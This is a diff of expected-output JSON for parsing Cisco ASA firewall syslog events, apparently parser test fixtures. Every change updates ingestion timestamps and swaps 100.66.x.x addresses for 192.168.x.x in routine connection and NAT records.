@@ -8976,8 +8976,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721734100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283", + "ingested": "2021-12-09T13:34:28.099753700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9010,8 +9010,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9046,7 +9046,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9055,8 +9055,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721738300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", + "ingested": "2021-12-09T13:34:28.099759600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9072,7 +9072,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11805", "source_interface": "outside", "mapped_destination_port": 1279 @@ -9094,8 +9094,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -9130,7 +9130,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9141,8 +9141,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721742600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:100.66.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", + "ingested": "2021-12-09T13:34:28.099765100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9179,8 +9179,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9215,7 +9215,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9226,8 +9226,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721747Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:100.66.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", + "ingested": "2021-12-09T13:34:28.099770800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9259,8 +9259,8 @@ }, "destination": { "port": 8284, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1280, @@ -9300,7 +9300,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -9308,8 +9308,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721752100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284", + "ingested": "2021-12-09T13:34:28.099776400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9342,8 +9342,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9378,7 +9378,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9387,8 +9387,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721757600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", + "ingested": "2021-12-09T13:34:28.099781900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9404,7 +9404,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11806", "source_interface": "outside", "mapped_destination_port": 1280 @@ -9426,8 +9426,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -9462,7 +9462,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9473,8 +9473,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721762200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:100.66.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", + "ingested": "2021-12-09T13:34:28.099787400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9506,8 +9506,8 @@ }, "destination": { "port": 8285, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1281, @@ -9547,7 +9547,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9555,8 +9555,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721766500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285", + "ingested": "2021-12-09T13:34:28.099793Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9589,8 +9589,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9625,7 +9625,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -9634,8 +9634,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721770700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", + "ingested": "2021-12-09T13:34:28.099798500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9651,7 +9651,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11807", "source_interface": "outside", "mapped_destination_port": 1281 @@ -9668,8 +9668,8 @@ }, "destination": { "port": 8286, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1282, @@ -9709,7 +9709,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9717,8 +9717,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721775500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286", + "ingested": "2021-12-09T13:34:28.099804100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9751,8 +9751,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -9787,7 +9787,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9796,8 +9796,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721780900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", + "ingested": "2021-12-09T13:34:28.099832200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9813,7 +9813,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11808", "source_interface": "outside", "mapped_destination_port": 1282 @@ -9830,8 +9830,8 @@ }, "destination": { "port": 8287, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1283, @@ -9871,7 +9871,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9879,8 +9879,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721786500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287", + "ingested": "2021-12-09T13:34:28.099838100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287", "code": "305011", "kind": "event", "action": "firewall-rule", 
@@ -9913,8 +9913,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9949,7 +9949,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9958,8 +9958,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721791300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", + "ingested": "2021-12-09T13:34:28.099842800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9975,7 +9975,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11809", "source_interface": "outside", "mapped_destination_port": 1283 @@ -9992,8 +9992,8 @@ }, "destination": { "port": 8288, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1284, @@ -10033,7 +10033,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -10041,8 +10041,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721795700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288", + "ingested": "2021-12-09T13:34:28.099846500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10075,8 +10075,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10111,7 +10111,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10120,8 +10120,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721800200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", + "ingested": "2021-12-09T13:34:28.099851100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10137,7 +10137,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11810", "source_interface": "outside", "mapped_destination_port": 1284 @@ -10159,8 +10159,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -10195,7 +10195,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10206,8 +10206,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721804900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:100.66.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", + "ingested": "2021-12-09T13:34:28.099856600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10244,8 +10244,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10280,7 +10280,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10291,8 +10291,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721809100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:100.66.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", + "ingested": "2021-12-09T13:34:28.099861600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10329,8 +10329,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -10365,7 +10365,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10376,8 +10376,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721813700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:100.66.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", + "ingested": "2021-12-09T13:34:28.099867600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10409,8 +10409,8 @@ }, "destination": { "port": 8289, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1285, @@ -10450,7 +10450,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10458,8 +10458,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721818500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289", + "ingested": "2021-12-09T13:34:28.099872Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10492,8 +10492,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10528,7 +10528,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -10537,8 +10537,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721822900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", + "ingested": "2021-12-09T13:34:28.099876400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10554,7 +10554,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11811", "source_interface": "outside", "mapped_destination_port": 1285 @@ -10571,8 +10571,8 @@ }, "destination": { "port": 8290, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1286, @@ -10612,7 +10612,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10620,8 +10620,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721827200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290", + "ingested": "2021-12-09T13:34:28.099896Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10654,8 +10654,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -10690,7 +10690,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10699,8 +10699,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721831500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", + "ingested": "2021-12-09T13:34:28.099900700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10716,7 +10716,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11812", "source_interface": "outside", "mapped_destination_port": 1286 @@ -10738,8 +10738,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10774,7 +10774,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10785,8 +10785,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721835700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:100.66.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", + "ingested": "2021-12-09T13:34:28.099906400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -10818,8 +10818,8 @@ }, "destination": { "port": 8291, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1287, @@ -10859,7 +10859,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10867,8 +10867,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721839900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291", + "ingested": "2021-12-09T13:34:28.099912100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10901,8 +10901,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10937,7 +10937,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10946,8 +10946,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721844200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", + "ingested": "2021-12-09T13:34:28.099939700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -10963,7 +10963,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11813", "source_interface": "outside", "mapped_destination_port": 1287 @@ -10985,8 +10985,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11021,7 +11021,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11032,8 +11032,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721849200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:100.66.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", + "ingested": "2021-12-09T13:34:28.099945700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11070,8 +11070,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11106,7 +11106,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -11117,8 +11117,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721853600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:100.66.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", + "ingested": "2021-12-09T13:34:28.099951700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11155,8 +11155,8 @@ }, "source": { "port": 53, - "address": "100.66.100.107", - "ip": "100.66.100.107" + "address": "192.168.100.107", + "ip": "192.168.100.107" }, "tags": [ "preserve_original_event" @@ -11191,7 +11191,7 @@ "localhost" ], "ip": [ - "100.66.100.107", + "192.168.100.107", "172.31.98.44" ] }, @@ -11200,8 +11200,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721858700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:100.66.100.107/53 (100.66.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099957600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -11217,7 +11217,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.107", + "mapped_source_ip": "192.168.100.107", "connection_id": "11814", "source_interface": "outside", "mapped_destination_port": 56132 
